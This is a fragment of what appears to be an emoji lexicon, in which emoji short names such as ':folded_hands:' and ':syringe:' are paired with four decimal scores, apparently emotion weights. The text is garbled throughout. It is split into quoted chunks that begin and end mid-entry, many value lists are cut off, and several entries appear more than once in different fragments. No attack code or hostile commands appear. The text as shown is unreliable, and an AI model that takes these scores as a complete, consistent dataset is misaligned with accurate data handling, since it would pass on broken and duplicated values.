\":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001],", "[0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341,", "0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\":", "\":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094,", "0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\":", "0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193],", "0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\":", "[0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998,", "\":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13,", "0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149],", "0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121],", "\":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259,", "\":tangerine:\": 
[0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184,", "[0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773,", "[0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003,", "\":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248,", "[0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997,", "\":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196,", "[0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247,", "0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\":", "\":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095,", "\":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31,", "0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12],", "0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191,", "\":sailboat:\": 
[0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275,", "\":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242,", "0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165,", "0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\":", "0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998,", "0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\":", "\":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171,", "0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247],", "0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998],", "[0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151,", "0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003],", "0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": 
[0.053, 0.14, 0.07, 0.08],", "[0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129,", "[0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175,", "0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16],", "0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002,", "\":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369,", "[0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308,", "0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235],", "0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\":", "0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115,", "\":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161,", "0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257],", "[0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284,", "0.265], \":office_building:\": [0.18100000000000002, 
0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002,", "0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\":", "[0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207,", "[0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171,", "0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002,", "[0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38,", "0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096],", "\":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218,", "0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997],", "[0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998,", "0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\":", "0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\":", "[0.14400000000000002, 0.341, 
0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317,", "0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243],", "\":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32,", "[0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316,", "[0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235,", "[0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001,", "0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\":", "\":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998,", "\":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196,", "0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001],", "\":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149,", "[0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083,", "0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], 
\":two_o’clock:\": [0.122, 0.35, 0.191, 0.298],", "[0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235,", "0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\":", "0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001],", "0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075,", "0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999,", "0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\":", "0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\":", "0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\":", "0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107,", "0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002],", "0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\":", "0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], 
\":penguin:\": [0.151, 0.188, 0.134, 0.141],", "0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077],", "0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133,", "\":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004,", "0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303,", "0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\":", "\":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213,", "0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218],", "[0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174,", "0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\":", "[0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999,", "[0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997,", "0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\":", 
"\":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121,", "0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152],", "[0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159,", "\":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207,", "0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\":", "\":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263,", "0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301],", "0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17],", "0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151],", "\":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16,", "0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\":", "\":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168,", 
"0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18],", "0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\":", "[0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158,", "0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\":", "0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998,", "0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\":", "0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168],", "0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158],", "0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322],", "0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\":", "0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\":", "0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313],", "[0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257,", 
"0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\":", "0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998,", "\":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16,", "\":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165,", "0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233,", "0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09],", "\":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27,", "0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\":", "0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\":", "0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999],", "0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\":", "[0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132,", "0.46, 0.299], 
\":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\":", "0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177],", "[0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317,", "0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204,", "\":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998,", "[0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997,", "0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001,", "0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151,", "0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002],", "0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\":", "0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\":", "\":recycling_symbol:\": 
[0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327,", "0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995,", "\":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22,", "[0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287,", "0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\":", "0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418,", "0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091],", "0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\":", "0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255],", "\":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299,", "0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\":", "0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\":", "0.11199999999999999, 0.147], 
\":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\":", "0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281,", "[0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358,", "0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998,", "\":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997,", "0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], 